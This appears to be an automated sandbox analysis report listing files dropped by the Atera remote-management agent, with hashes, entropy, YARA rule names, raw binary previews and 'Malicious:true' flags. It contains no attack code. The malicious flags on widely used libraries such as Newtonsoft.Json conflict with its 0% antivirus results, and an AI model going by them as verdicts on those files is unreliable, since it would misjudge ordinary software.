                                                                                                                                                                                                                                        SSDEEP:192:jXh+/DtY2PLNyby2sE9jBF6IYiYF85S35IVnxGUHFeFlW9OtuYo:jXh+tY2jNyb8E9VF6IYijSJIVxaFmIU
                                                                                                                                                                                                                                        MD5:DE0940A5587A4484D0887A9E8F9525AC
                                                                                                                                                                                                                                        SHA1:A899252BCBA0A838D0ECE4B5424F20F7D55C4E2F
                                                                                                                                                                                                                                        SHA-256:57EFC5A6135C080291943EE3E54B42992AE3CFED361DE0C4CB0880D06F70E87E
                                                                                                                                                                                                                                        SHA-512:E2B90F6B89DD9FB3D80A04D4361BCBA24AA95E6FA539D3E9A298E53E63E8AF48342DBFA56DB12FF70812B4D86FA143A1CD361DB97CAE34483E8739D0D583C560
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ..............................H.....@.................................",..O....@..(...............((...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75304
                                                                                                                                                                                                                                        Entropy (8bit):6.240548247823196
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYM:AF+qo7mDEwj4NXLGcfgruFcaD76j6G
                                                                                                                                                                                                                                        MD5:EA66884148B982C181938D224D2864BF
                                                                                                                                                                                                                                        SHA1:3F10A7B2D40028814C9CEE4F1B968D35615FEBE4
                                                                                                                                                                                                                                        SHA-256:A66431B4751E904E6534C70A214DF47CFB6F277A638DC273578B21E4AFF30F97
                                                                                                                                                                                                                                        SHA-512:D6A7FB617F369A9775804585680DECF859588E216A7084ACBEF19CAEC62C32CBEF5427E56FDED786B4F1D8C5531BE1B48CCB6941EE2AB7CBD9FCD1B2CA6D656D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`............`.....................................O.... ..................((...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51752
                                                                                                                                                                                                                                        Entropy (8bit):6.406947621251296
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:0QMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyXXEpYi606:09MYn1seLE8JFMLcyXQ763
                                                                                                                                                                                                                                        MD5:44572E361C8A5D83D3F88FBF26678CB6
                                                                                                                                                                                                                                        SHA1:F675826057A670E24787C1AF8FD1DDE7095512FE
                                                                                                                                                                                                                                        SHA-256:8FA8A85424521011BEFF1A943D6B43DBF4C1919F64059ABBAD713959AA1CBF78
                                                                                                                                                                                                                                        SHA-512:F1F6F2C953BBD277042FD20665F9F0D10C0FF8BDB3E126436CEFC7D5B425171DDF52F671E38F901622056DFD5E2E49D455963C1687EBA63C3ED30FF2FFFD3F7D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............((..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145448
                                                                                                                                                                                                                                        Entropy (8bit):6.203459095547969
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:DRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhS:d9XeDmzV2yzlhKLFU1lLVp1+2flYFnQ7
                                                                                                                                                                                                                                        MD5:93E80E2402F809533066A5CFAB1A036D
                                                                                                                                                                                                                                        SHA1:E687A74691A96C38AF2C002ED084EA3989EE62F1
                                                                                                                                                                                                                                        SHA-256:34EC376EADB8E017FABE9DBEA7044BFC09C2CC6DB606DB8B92CEFD4A2128FD05
                                                                                                                                                                                                                                        SHA-512:01BC86EF55526457AF49526E9C85EA140C4E053A5463C3293109F14780DE37DA4929D3727407243DC1101CEC03F402D219F0E088BF21B194FB327340A7075710
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ...................................`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96296
                                                                                                                                                                                                                                        Entropy (8bit):5.633445559193163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:N2kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhkW76fJE:eQmyxL2L4D+YZL2X7SAaqywjhkWeE
                                                                                                                                                                                                                                        MD5:C761AE0EFFEBBC19712FF0AFA47CE0DE
                                                                                                                                                                                                                                        SHA1:97F433BEF7A8B99A9AA7AE9FDB3AD6EB1D106390
                                                                                                                                                                                                                                        SHA-256:12827A7383B15852EE8FF708877362C8BF576F44FDAE4E6FF9A9B1690D683328
                                                                                                                                                                                                                                        SHA-512:707BFB532BA8F997F5D2469ED11028666AF64044D179C083C71A14FE8A54E9368C6D69882D1E512CDC44EC792761D0CFD4EE5152B010F691F5E493FC0BB6C36E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W...........!..... ... .......7... ...@....@.. ..............................d'....@.................................47..W....@..p............P..((...`....................................................... ............... ..H............text........ ... .................. ..`.rsrc...p....@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):386600
                                                                                                                                                                                                                                        Entropy (8bit):6.135834446764712
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:9sETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEyk:9sbZnMfwWFKFrrWa8BvEyk
                                                                                                                                                                                                                                        MD5:CEC5B94BA8647554464BB8E6923BCEE9
                                                                                                                                                                                                                                        SHA1:4CF191F4477CF7B82ACC4405DE4CB558AEA668B1
                                                                                                                                                                                                                                        SHA-256:624AA1E6343CE9310389307B612D40EEBD6B04E24123E4190D1DACF521FC11A3
                                                                                                                                                                                                                                        SHA-512:1061BFA98B472B6999420B77728084C1281872687AE90687C01F3077FEB2272BC42153592D72D6B8D618C70C7D0240D9558B5D6EBAF838EF05BBEA67FC0FF18E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ...........`.....................................O.......@...............((..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......T...$...................x.........................................{0...*..{1...*..{2...*..{3...*..(4.....}0.....}1.....}2......}3...*....0..q........u........d.,_(5....{0....{0...o6...,G(7....{1....{1...o8...,/(9....{2....{2...o:...,.(;....{3....{3...o<...*.*.*....0..b....... ...u )UU.Z(5....{0...o=...X )UU.Z(7....{1...o>...X )UU.Z(9....{2...o?...X )UU.Z(;....{3...o@...X*...0...........r...p......%..{0......%q.........-.&.+.......oA....%..{1......%q.........-.&.+.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.835638359040336
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ZN9VWhX3WseNyb8E9VF6IYijSJIVxF5WBL0:rGZmEpYi60C0
                                                                                                                                                                                                                                        MD5:9FB340DC924069CCBDB4A53109680505
                                                                                                                                                                                                                                        SHA1:1F5F1A7A81991852931399A0E11458C8F1B86627
                                                                                                                                                                                                                                        SHA-256:4A53EBD4A61DCA9EB0F46625701BF9C1720A2AA4BE23EA1BFFEB9CC0D24334A9
                                                                                                                                                                                                                                        SHA-512:9BF44EF2319E0C3C50803EEE5066852323C931864C1241E77AC5A0ADA18D70B5C7734776C085C7D7D265771F81DE324F2332D91DE67AADEB858628AC2227C2F2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ...............................Y....@.................................T(..O....@..0...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331816
                                                                                                                                                                                                                                        Entropy (8bit):6.168725098420968
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTF:sDMUWITZznu85k8Wdn8KmCjIFi3Vv5
                                                                                                                                                                                                                                        MD5:6F8BEC6FACB3F7CCB38397B08590A196
                                                                                                                                                                                                                                        SHA1:1EA9953A3876025FC40EC7F58F6EB5ECB469951C
                                                                                                                                                                                                                                        SHA-256:8A14F59A3E963DBCAAF23706C91F02A390D68425FD160745174FB847FE750BE1
                                                                                                                                                                                                                                        SHA-512:4CE87BCB73E960626A553FD3E162E23B3C054E46740DAF198898ED79C4B3FC6720AC1CA1E8AB3CFBB3D43F1036AE4331B9069730A9B165DD2BC2C87A014E47B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@.......>....@.....................................O.......................((... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883752
                                                                                                                                                                                                                                        Entropy (8bit):6.071468980672946
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:h1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ/:h1n1p9LdRN39aQZUqm
                                                                                                                                                                                                                                        MD5:29DCD9B065CFB49C8E52C930F7F4CE09
                                                                                                                                                                                                                                        SHA1:768CCADA86D84899E458221931EF08DFFF18D4DD
                                                                                                                                                                                                                                        SHA-256:1B6A5C03895D4722AE6A575B45564BAC1F6B7C63A8B3317CDA7048F868BBE8BD
                                                                                                                                                                                                                                        SHA-512:2C620A2E6003DCF311F40C8CA4AADBEFD572E1A20C7ED323AE738C9C23F20267F66DB0CA61A9796F45198C137404468A71EC7D7DE0F5A947B8B0BF0A6159C439
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..((.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.960227950500775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:YBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUJ+t:YBA/ZTvQD0XY0AJBSjRlXP36RMGvt
                                                                                                                                                                                                                                        MD5:9793A92CB1C1C940989601DEE0F0DBCF
                                                                                                                                                                                                                                        SHA1:958BA5FC0E03CCB502566A66C41F8AD5E38890D9
                                                                                                                                                                                                                                        SHA-256:B9E1C3B969F7D54FA8830E83AA3B5A53B8016D3F69CCDEF55BA730ACBE63E844
                                                                                                                                                                                                                                        SHA-512:0BF96E24288878A5A8554CE7FEB8988CB9CC9447E7734CA0AC44B973F0A49B54C4AC254743AE2FEE31AB7C8B4C21952AC1E3AACE43063D54C80A7DD174BEC3E3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......g<....`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285736
                                                                                                                                                                                                                                        Entropy (8bit):6.18456718086945
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:DZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zvH:DZU0BJwuOcrl1w7HX3HWi
                                                                                                                                                                                                                                        MD5:2D9C14E9D5F1DD0D6F4561AFE4EFB117
                                                                                                                                                                                                                                        SHA1:C35DE5E2080905AC3E1E488A7438D97D1DBAB813
                                                                                                                                                                                                                                        SHA-256:92C283F20DFE5948DF55FE662EFFCAE4C29796EA30619EA5680565D7ACD232DE
                                                                                                                                                                                                                                        SHA-512:FF68BA66200A352E2A342C4302C863C08D19BF697A3AFF12104C396F17BE19720E9EFA2CF6ECB639FCAD24E96429AB2269AFE3962C76CE781F14526B08DD13E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..*..........&H... ...`....... ...............................9....`..................................G..O....`..L............4..((...........G..T............................................ ............... ..H............text...,(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H....... d..t....................F......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25640
                                                                                                                                                                                                                                        Entropy (8bit):6.559882733809932
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3AQk7qYbA6fXDpLk5LHAxOEaGxBtNXNyb8E9VF6IYijSJIVxstR:k1LOg3BtNbEpYi60C
                                                                                                                                                                                                                                        MD5:DCFD01239E8A7F23790A7101DA676EF0
                                                                                                                                                                                                                                        SHA1:DD4634C7D293365B988B94E90A6D3D5870C1B943
                                                                                                                                                                                                                                        SHA-256:276C6EF4FAB5412DD3CD67B02D109F1F17CD095EF76A759E57CBFD90721558CC
                                                                                                                                                                                                                                        SHA-512:E77FBB7077283EBE3E1438A7EB318EF377EA13009898C486035A0A453A9ECB56E93728E91983A848B12D1D2FAC38581DFB08E424831A7F6A6FBAB305EC4CF891
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."...0..2...........Q... ...`....@.. ....................................`..................................Q..O....`...............<..((...........P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H........*.. &...........................................................0..:.......~....s....(.....(.~....r...p.o....r...p.o....(....o......*.............(......(....*.s.........*.0...........(.....(....o....r...p(....}......}.....s....}......{....s....}......{....s....}......{....s....}.....s....}.....(...+.~....%-.&~..........s....%............s....(.....{....s ...}......{....s!...}......{.....{....s....}....*.0...........(....,..(....*.{.... ....rU..pr...p.o"...u(.....(#.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2029
                                                                                                                                                                                                                                        Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                        MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                        SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                        SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                        SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):210984
                                                                                                                                                                                                                                        Entropy (8bit):5.347926641317825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:asMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z54a7w:vMNkrE4AOqcIzQijLW
                                                                                                                                                                                                                                        MD5:D62F66067037F0A886F49623432A910C
                                                                                                                                                                                                                                        SHA1:1B004247986129E223012CD0EB4102EC09261EF1
                                                                                                                                                                                                                                        SHA-256:EC905D40CCA16B8541361CE8B46AED84696D7AC058B24CAFA05C537D122D6C20
